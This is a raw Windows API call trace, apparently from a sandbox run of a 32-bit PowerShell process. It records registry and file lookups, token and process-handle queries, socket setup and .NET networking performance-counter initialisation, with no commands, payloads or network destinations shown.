	[0235.236] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae1ac, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae1ac*=0x1000, lpOverlapped=0x0) returned 1
	[0235.236] GetLastError () returned 0x0
	[0235.236] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae040, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae040*=0xed, lpOverlapped=0x0) returned 1
	[0235.236] GetLastError () returned 0x0
	[0235.236] ReadFile (in: hFile=0x38c, lpBuffer=0x2af9138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5eae0f8, lpOverlapped=0x0 | out: lpBuffer=0x2af9138*, lpNumberOfBytesRead=0x5eae0f8*=0x0, lpOverlapped=0x0) returned 1
	[0235.236] GetLastError () returned 0x0
	[0235.239] CloseHandle (hObject=0x38c) returned 1
	[0235.239] GetLastError () returned 0x0
	[0235.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5eae2ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.243] GetLastError () returned 0x0
	[0235.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5eae260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.243] GetLastError () returned 0x0
	[0235.243] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x390a68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0235.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x5eae2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0235.244] GetLastError () returned 0x0
	[0235.244] GetCurrentProcess () returned 0xffffffff
	[0235.244] GetLastError () returned 0x3f0
	[0235.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae688 | out: TokenHandle=0x5eae688*=0x38c) returned 1
	[0235.245] GetLastError () returned 0x3f0
	[0235.247] GetCurrentProcess () returned 0xffffffff
	[0235.247] GetLastError () returned 0x3f0
	[0235.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae688 | out: TokenHandle=0x5eae688*=0x388) returned 1
	[0235.247] GetLastError () returned 0x3f0
	[0235.294] GetCurrentProcess () returned 0xffffffff
	[0235.294] GetLastError () returned 0x3f0
	[0235.294] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae3f8 | out: TokenHandle=0x5eae3f8*=0x390) returned 1
	[0235.294] GetLastError () returned 0x3f0
	[0235.294] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5eae438 | out: lpFileInformation=0x5eae438*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0235.294] GetLastError () returned 0x2
	[0235.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x5eadf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0235.295] GetLastError () returned 0x2
	[0235.295] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x5eae434 | out: lpFileInformation=0x5eae434*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0235.295] GetLastError () returned 0x2
	[0235.295] GetCurrentProcess () returned 0xffffffff
	[0235.390] GetLastError () returned 0x3f0
	[0235.390] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae688 | out: TokenHandle=0x5eae688*=0x394) returned 1
	[0235.390] GetLastError () returned 0x3f0
	[0235.390] GetCurrentProcess () returned 0xffffffff
	[0235.390] GetLastError () returned 0x3f0
	[0235.391] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae688 | out: TokenHandle=0x5eae688*=0x398) returned 1
	[0235.391] GetLastError () returned 0x3f0
	[0235.434] GetCurrentProcess () returned 0xffffffff
	[0235.434] GetLastError () returned 0x3f0
	[0235.434] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae464 | out: TokenHandle=0x5eae464*=0x3d0) returned 1
	[0235.434] GetLastError () returned 0x3f0
	[0235.677] GetCurrentProcess () returned 0xffffffff
	[0235.677] GetLastError () returned 0x3f0
	[0235.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae474 | out: TokenHandle=0x5eae474*=0x3d4) returned 1
	[0235.677] GetLastError () returned 0x3f0
	[0235.760] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x38ef58 | out: lpWSAData=0x38ef58) returned 0
	[0235.768] GetLastError () returned 0x0
	[0235.777] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x5eae014 | out: phkResult=0x5eae014*=0x3e0) returned 0x0
	[0235.778] RegQueryValueExW (in: hKey=0x3e0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5eae05c, lpData=0x0, lpcbData=0x5eae058*=0x0 | out: lpType=0x5eae05c*=0x1, lpData=0x0, lpcbData=0x5eae058*=0xe) returned 0x0
	[0235.778] RegQueryValueExW (in: hKey=0x3e0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x5eae05c, lpData=0x38ef58, lpcbData=0x5eae058*=0xe | out: lpType=0x5eae05c*=0x1, lpData="Client", lpcbData=0x5eae058*=0xe) returned 0x0
	[0235.779] RegCloseKey (hKey=0x3e0) returned 0x0
	[0235.786] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e4
	[0235.794] GetLastError () returned 0x0
	[0235.794] setsockopt (s=0x3e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0235.794] GetLastError () returned 0x273a
	[0235.794] closesocket (s=0x3e4) returned 0
	[0235.889] GetLastError () returned 0x0
	[0235.889] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3e4
	[0235.905] GetLastError () returned 0x0
	[0235.905] setsockopt (s=0x3e4, level=65535, optname=128, optval="\x01", optlen=4) returned -1
	[0235.905] GetLastError () returned 0x273a
	[0235.905] closesocket (s=0x3e4) returned 0
	[0235.905] GetLastError () returned 0x0
	[0235.911] GetCurrentProcess () returned 0xffffffff
	[0235.911] GetLastError () returned 0x3f0
	[0235.911] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae430 | out: TokenHandle=0x5eae430*=0x3e4) returned 1
	[0235.911] GetLastError () returned 0x3f0
	[0235.918] GetCurrentProcess () returned 0xffffffff
	[0235.918] GetLastError () returned 0x3f0
	[0235.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5eae440 | out: TokenHandle=0x5eae440*=0x3e8) returned 1
	[0235.918] GetLastError () returned 0x3f0
	[0236.058] GetCurrentProcessId () returned 0x728
	[0236.062] GetComputerNameW (in: lpBuffer=0x390a68, nSize=0x2b16b80 | out: lpBuffer="XDUWTFONO", nSize=0x2b16b80) returned 1
	[0236.063] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5eae694 | out: phkResult=0x5eae694*=0x3ec) returned 0x0
	[0236.063] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Library", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x0, lpcbData=0x5eae6d8*=0x0 | out: lpType=0x5eae6dc*=0x1, lpData=0x0, lpcbData=0x5eae6d8*=0x1c) returned 0x0
	[0236.064] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Library", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x38ef58, lpcbData=0x5eae6d8*=0x1c | out: lpType=0x5eae6dc*=0x1, lpData="netfxperf.dll", lpcbData=0x5eae6d8*=0x1c) returned 0x0
	[0236.064] RegQueryValueExW (in: hKey=0x3ec, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x0, lpcbData=0x5eae6d8*=0x0 | out: lpType=0x5eae6dc*=0x4, lpData=0x0, lpcbData=0x5eae6d8*=0x4) returned 0x0
	[0236.066] RegQueryValueExW (in: hKey=0x3ec, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x5eae6c8, lpcbData=0x5eae6d8*=0x4 | out: lpType=0x5eae6dc*=0x4, lpData=0x5eae6c8*=0x1, lpcbData=0x5eae6d8*=0x4) returned 0x0
	[0236.066] RegQueryValueExW (in: hKey=0x3ec, lpValueName="First Counter", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x0, lpcbData=0x5eae6d8*=0x0 | out: lpType=0x5eae6dc*=0x4, lpData=0x0, lpcbData=0x5eae6d8*=0x4) returned 0x0
	[0236.066] RegQueryValueExW (in: hKey=0x3ec, lpValueName="First Counter", lpReserved=0x0, lpType=0x5eae6dc, lpData=0x5eae6c8, lpcbData=0x5eae6d8*=0x4 | out: lpType=0x5eae6dc*=0x4, lpData=0x5eae6c8*=0x137a, lpcbData=0x5eae6d8*=0x4) returned 0x0
	[0236.066] RegCloseKey (hKey=0x3ec) returned 0x0
	[0236.069] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x5eae690 | out: phkResult=0x5eae690*=0x3ec) returned 0x0
	[0236.069] RegQueryValueExW (in: hKey=0x3ec, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x0, lpcbData=0x5eae6d4*=0x0 | out: lpType=0x5eae6d8*=0x4, lpData=0x0, lpcbData=0x5eae6d4*=0x4) returned 0x0
	[0236.070] RegQueryValueExW (in: hKey=0x3ec, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x5eae6c4, lpcbData=0x5eae6d4*=0x4 | out: lpType=0x5eae6d8*=0x4, lpData=0x5eae6c4*=0x3, lpcbData=0x5eae6d4*=0x4) returned 0x0
	[0236.070] RegQueryValueExW (in: hKey=0x3ec, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x0, lpcbData=0x5eae6d4*=0x0 | out: lpType=0x5eae6d8*=0x4, lpData=0x0, lpcbData=0x5eae6d4*=0x4) returned 0x0
	[0236.070] RegQueryValueExW (in: hKey=0x3ec, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x5eae6c4, lpcbData=0x5eae6d4*=0x4 | out: lpType=0x5eae6d8*=0x4, lpData=0x5eae6c4*=0x20000, lpcbData=0x5eae6d4*=0x4) returned 0x0
	[0236.070] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x0, lpcbData=0x5eae6d4*=0x0 | out: lpType=0x5eae6d8*=0x3, lpData=0x0, lpcbData=0x5eae6d4*=0xaa) returned 0x0
	[0236.070] RegQueryValueExW (in: hKey=0x3ec, lpValueName="Counter Names", lpReserved=0x0, lpType=0x5eae6d8, lpData=0x2b192c4, lpcbData=0x5eae6d4*=0xaa | out: lpType=0x5eae6d8*=0x3, lpData=0x2b192c4*, lpcbData=0x5eae6d4*=0xaa) returned 0x0
	[0236.075] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0236.160] GetLastError () returned 0x0
	[0236.165] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x38ef88, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x0
	[0236.165] GetLastError () returned 0x5
	[0236.169] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net clr networking") returned 0x3f8
	[0236.169] GetLastError () returned 0x5
	[0236.173] MapViewOfFile (hFileMappingObject=0x3f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x5270000
	[0236.176] VirtualQuery (in: lpAddress=0x5270000, lpBuffer=0x5eae6a8, dwLength=0x1c | out: lpBuffer=0x5eae6a8*(BaseAddress=0x5270000, AllocationBase=0x5270000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c
	[0236.176] GetLastError () returned 0x5
	[0236.176] LocalFree (hMem=0x380b78) returned 0x0
	[0236.177] RegCloseKey (hKey=0x3ec) returned 0x0
	[0236.179] GetVersionExW (in: lpVersionInformation=0x38ef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x38ef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.180] GetLastError () returned 0x5
	[0236.180] GetVersionExW (in: lpVersionInformation=0x38ef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x38ef70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0236.180] GetLastError () returned 0x5
	[0236.183] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2b19d40, cbSid=0x5eae688 | out: pSid=0x2b19d40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x5eae688) returned 1
	[0236.183] GetLastError () returned 0x5
	[0236.186] CreateMutexW (lpMutexAttributes=0x2b19e78, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3ec
	[0236.187] GetLastError () returned 0x0
	[0236.189] WaitForSingleObject (hHandle=0x3ec, dwMilliseconds=0x1f4) returned 0x0
	[0236.189] GetLastError () returned 0x0
	[0236.189] GetCurrentProcessId () returned 0x728
	[0236.190] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x3fc
	[0236.191] GetLastError () returned 0x0
	[0236.194] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae5f0, lpExitTime=0x5eae5e8, lpKernelTime=0x5eae5e8, lpUserTime=0x5eae5e8 | out: lpCreationTime=0x5eae5f0, lpExitTime=0x5eae5e8, lpKernelTime=0x5eae5e8, lpUserTime=0x5eae5e8) returned 1
	[0236.194] GetLastError () returned 0x0
	[0236.195] CloseHandle (hObject=0x3fc) returned 1
	[0236.195] GetLastError () returned 0x0
	[0236.195] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0x3fc
	[0236.195] GetLastError () returned 0x0
	[0236.195] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.195] GetLastError () returned 0x0
	[0236.196] CloseHandle (hObject=0x3fc) returned 1
	[0236.196] GetLastError () returned 0x0
	[0236.196] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x864) returned 0x3fc
	[0236.196] GetLastError () returned 0x0
	[0236.196] GetCurrentProcess () returned 0xffffffff
	[0236.196] GetLastError () returned 0x0
	[0236.196] GetCurrentProcess () returned 0xffffffff
	[0236.197] GetLastError () returned 0x0
	[0236.200] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.295] GetLastError () returned 0x0
	[0236.299] CloseHandle (hObject=0x404) returned 1
	[0236.299] GetLastError () returned 0x0
	[0236.300] CloseHandle (hObject=0x3fc) returned 1
	[0236.300] GetLastError () returned 0x0
	[0236.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb30) returned 0x3fc
	[0236.300] GetLastError () returned 0x0
	[0236.300] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.300] GetLastError () returned 0x0
	[0236.300] CloseHandle (hObject=0x3fc) returned 1
	[0236.300] GetLastError () returned 0x0
	[0236.300] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xb30) returned 0x3fc
	[0236.300] GetLastError () returned 0x0
	[0236.300] GetCurrentProcess () returned 0xffffffff
	[0236.301] GetLastError () returned 0x0
	[0236.301] GetCurrentProcess () returned 0xffffffff
	[0236.301] GetLastError () returned 0x0
	[0236.301] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.301] GetLastError () returned 0x0
	[0236.301] CloseHandle (hObject=0x404) returned 1
	[0236.301] GetLastError () returned 0x0
	[0236.301] CloseHandle (hObject=0x3fc) returned 1
	[0236.302] GetLastError () returned 0x0
	[0236.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x888) returned 0x3fc
	[0236.302] GetLastError () returned 0x0
	[0236.302] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.302] GetLastError () returned 0x0
	[0236.302] CloseHandle (hObject=0x3fc) returned 1
	[0236.302] GetLastError () returned 0x0
	[0236.302] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x888) returned 0x3fc
	[0236.302] GetLastError () returned 0x0
	[0236.302] GetCurrentProcess () returned 0xffffffff
	[0236.302] GetLastError () returned 0x0
	[0236.302] GetCurrentProcess () returned 0xffffffff
	[0236.302] GetLastError () returned 0x0
	[0236.302] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.302] GetLastError () returned 0x0
	[0236.303] CloseHandle (hObject=0x404) returned 1
	[0236.303] GetLastError () returned 0x0
	[0236.303] CloseHandle (hObject=0x3fc) returned 1
	[0236.303] GetLastError () returned 0x0
	[0236.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x708) returned 0x3fc
	[0236.303] GetLastError () returned 0x0
	[0236.303] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.303] GetLastError () returned 0x0
	[0236.303] CloseHandle (hObject=0x3fc) returned 1
	[0236.303] GetLastError () returned 0x0
	[0236.304] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x708) returned 0x3fc
	[0236.304] GetLastError () returned 0x0
	[0236.304] GetCurrentProcess () returned 0xffffffff
	[0236.304] GetLastError () returned 0x0
	[0236.304] GetCurrentProcess () returned 0xffffffff
	[0236.304] GetLastError () returned 0x0
	[0236.304] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.304] GetLastError () returned 0x0
	[0236.304] CloseHandle (hObject=0x404) returned 1
	[0236.304] GetLastError () returned 0x0
	[0236.304] CloseHandle (hObject=0x3fc) returned 1
	[0236.304] GetLastError () returned 0x0
	[0236.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x120) returned 0x3fc
	[0236.305] GetLastError () returned 0x0
	[0236.305] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.305] GetLastError () returned 0x0
	[0236.305] CloseHandle (hObject=0x3fc) returned 1
	[0236.305] GetLastError () returned 0x0
	[0236.305] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x120) returned 0x3fc
	[0236.305] GetLastError () returned 0x0
	[0236.305] GetCurrentProcess () returned 0xffffffff
	[0236.305] GetLastError () returned 0x0
	[0236.305] GetCurrentProcess () returned 0xffffffff
	[0236.305] GetLastError () returned 0x0
	[0236.305] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.305] GetLastError () returned 0x0
	[0236.306] CloseHandle (hObject=0x404) returned 1
	[0236.306] GetLastError () returned 0x0
	[0236.306] CloseHandle (hObject=0x3fc) returned 1
	[0236.306] GetLastError () returned 0x0
	[0236.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3fc
	[0236.306] GetLastError () returned 0x0
	[0236.306] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.306] GetLastError () returned 0x0
	[0236.306] CloseHandle (hObject=0x3fc) returned 1
	[0236.306] GetLastError () returned 0x0
	[0236.307] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0xaa0) returned 0x3fc
	[0236.307] GetLastError () returned 0x0
	[0236.307] GetCurrentProcess () returned 0xffffffff
	[0236.307] GetLastError () returned 0x0
	[0236.307] GetCurrentProcess () returned 0xffffffff
	[0236.307] GetLastError () returned 0x0
	[0236.307] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.307] GetLastError () returned 0x0
	[0236.307] CloseHandle (hObject=0x404) returned 1
	[0236.307] GetLastError () returned 0x0
	[0236.307] CloseHandle (hObject=0x3fc) returned 1
	[0236.308] GetLastError () returned 0x0
	[0236.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x808) returned 0x3fc
	[0236.308] GetLastError () returned 0x0
	[0236.308] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.308] GetLastError () returned 0x0
	[0236.308] CloseHandle (hObject=0x3fc) returned 1
	[0236.308] GetLastError () returned 0x0
	[0236.308] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x808) returned 0x3fc
	[0236.308] GetLastError () returned 0x0
	[0236.308] GetCurrentProcess () returned 0xffffffff
	[0236.308] GetLastError () returned 0x0
	[0236.308] GetCurrentProcess () returned 0xffffffff
	[0236.308] GetLastError () returned 0x0
	[0236.308] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.308] GetLastError () returned 0x0
	[0236.309] CloseHandle (hObject=0x404) returned 1
	[0236.309] GetLastError () returned 0x0
	[0236.309] CloseHandle (hObject=0x3fc) returned 1
	[0236.309] GetLastError () returned 0x0
	[0236.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3fc
	[0236.309] GetLastError () returned 0x0
	[0236.309] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.309] GetLastError () returned 0x0
	[0236.310] CloseHandle (hObject=0x3fc) returned 1
	[0236.310] GetLastError () returned 0x0
	[0236.310] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x8c4) returned 0x3fc
	[0236.310] GetLastError () returned 0x0
	[0236.310] GetCurrentProcess () returned 0xffffffff
	[0236.310] GetLastError () returned 0x0
	[0236.310] GetCurrentProcess () returned 0xffffffff
	[0236.310] GetLastError () returned 0x0
	[0236.310] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5eae5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5eae5a0*=0x404) returned 1
	[0236.310] GetLastError () returned 0x0
	[0236.310] CloseHandle (hObject=0x404) returned 1
	[0236.310] GetLastError () returned 0x0
	[0236.311] CloseHandle (hObject=0x3fc) returned 1
	[0236.311] GetLastError () returned 0x0
	[0236.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3fc
	[0236.311] GetLastError () returned 0x0
	[0236.311] GetProcessTimes (in: hProcess=0x3fc, lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638 | out: lpCreationTime=0x5eae640, lpExitTime=0x5eae638, lpKernelTime=0x5eae638, lpUserTime=0x5eae638) returned 1
	[0236.311] GetLastError () returned 0x0
	[0236.311] CloseHandle (hObject=0x3fc) returned 1
	[0236.311] GetLastError () returned 0x0
	[0236.311] OpenProcess (dwDesiredAccess=0x100000, bInheritHandle=0, dwProcessId=0x7cc) returned 0x3fc
	[0236.311] GetLastError () returned 0x0
